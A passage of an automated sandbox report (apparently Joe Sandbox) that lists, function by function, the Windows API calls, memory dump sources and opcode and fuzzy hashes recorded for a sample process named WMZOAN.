                                            • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                            • Instruction Fuzzy Hash: 36B19FA9F0A6C681EA67DE71D8C823D6690AF54B84F0D84B5DECC27795DE3CE4418B40
                                            APIs
                                            • GetStartupInfoA.KERNEL32 ref: 0000000140009F76
                                              • Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0
                                            • GetFileType.KERNEL32 ref: 000000014000A11C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: FileInfoSleepStartupType
                                            • String ID:
                                            • API String ID: 1527402494-0
                                            • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                            • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                            • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                            • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CommandLine$ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 3078728599-0
                                            • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                            • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                            • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                            • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7
                                              • Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A
                                            • GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
                                            • WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
                                            • WriteConsoleA.KERNEL32 ref: 000000014000FE32
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 1850339568-0
                                            • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                            • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                            • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                            • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                            • Instruction ID: fd00043dbdc0e26984848d2a621f25d64e936447e0f616837a9782a9aca02444
                                            • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                            • Instruction Fuzzy Hash: F91186FAF18B8B41F7561938EDAD37D11416F983B4F1C06B4E5EE362DA9E2C68414B01
                                            APIs
                                            • FlsGetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096A3
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096C2
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096EA
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096FB
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B0970C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                            • Instruction ID: 9a9512f9a42540bc6b862747460f43c28e09d573c58c3334cb0f0466792b34c7
                                            • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                            • Instruction Fuzzy Hash: 29115E98B0C2C245FA56AF35DD9917D21619F583F0F5C43B5E8FE266E6EE2CE4418300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                            • Instruction ID: a78ce57e1de5c6efd0b1d20659454b6ab182629667e4fe25375986bf42d9c7e8
                                            • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                            • Instruction Fuzzy Hash: 71110DD8A0D2C249F96AAF72DC9A17D21518F58370E1C07B5D8FE792E2EE2CB4418300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                            • Instruction ID: 608544a07c1e7e01f096f9bf6fffd21f97bd915f0b5be579cf2bc3c336a2214f
                                            • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                            • Instruction Fuzzy Hash: 5F9192B7A187858AE711CF74D8882AD77A0F744788F18417AEA8D27B65DF38D195C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                            • Instruction ID: 86539e3abcfa84b2ee789653d1c768732146caefa166c70540bad34cec738614
                                            • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                            • Instruction Fuzzy Hash: 3751907AB1D6828ADB158F39D88CA7C7391EB44B98F188171DA8E57788DF7DE841C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                            • Instruction ID: ce0ee3e96ed25f1bf347dc3f697a8b08adede76479ca64b5692b14bfa6c642ce
                                            • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                            • Instruction Fuzzy Hash: C7618D7690CBC585DA228F25E8843AEB7A0FB84784F084266EBDD17B59CF7CD190CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                            • Instruction ID: 964e739289b67f9ad0e8c80ef6b3c265c76e4a4139bd071a2c1e04cbb002d54e
                                            • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                            • Instruction Fuzzy Hash: 8A516BBA90C2C28AEB658F21D8C836C76A0EB54B84F1841B6DADD67B95CF3CF451C701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressHandleLoadModuleProc
                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                            • API String ID: 3055805555-3733552308
                                            • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                            • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                            • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                            • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Process$CurrentSizeWorking
                                            • String ID: Shrinking process size
                                            • API String ID: 2122760700-652428428
                                            • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                            • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                            • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                            • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Enter$Leave
                                            • String ID:
                                            • API String ID: 2801635615-0
                                            • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                            • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                            • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                            • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                            • Instruction ID: 7e3e2b15fd44f0ed2f5712776c9062711b1aeff23b529e8db41c070b699e9d9c
                                            • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                            • Instruction Fuzzy Hash: 8DD1C47AF18A8189E712CF75D8842EC37B1FB44B98B184276DE9D67B95DE38D406C340
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EE38
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EEC3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode
                                            • String ID:
                                            • API String ID: 953036326-0
                                            • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                            • Instruction ID: 038b2e624bf6f61932932c73940eff92ff04bab0843a94ed370339952cfbe303
                                            • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                            • Instruction Fuzzy Hash: 5691C6BEF28A9585F7528F75D8C827D6BA0AB44F88F184175DE8E76684DF38D441C700
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                            • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                            • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                            • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalEventSection$EnterLeaveReset
                                            • String ID:
                                            • API String ID: 3553466030-0
                                            • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                            • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                            • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                            • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalEventSection$EnterLeaveReset
                                            • String ID:
                                            • API String ID: 3553466030-0
                                            • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                            • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                            • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                            • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                            • Instruction ID: 1703987ebb6ae05a9e8a0046b5cdec7ec529aaae1155a173a9b0b0a63eb22af1
                                            • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                            • Instruction Fuzzy Hash: FF113A6AB14B418AEB00CF70EC583B833A4F719758F080E75DAAD967A4DF38D1588340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateEvent$CriticalInitializeSection
                                            • String ID:
                                            • API String ID: 926662266-0
                                            • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                            • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                            • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                            • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: __except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 1467352782-3733052814
                                            • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                            • Instruction ID: 5743eafedc82cf26ed1674fe0ba34b3f44d0f61a7ec9152a98fbdab1dada9a2f
                                            • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                            • Instruction Fuzzy Hash: 2C717FBA90C6C58AD7628F35D8887BD7BA0FB04B84F188176DECC67A89CB2CD451C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
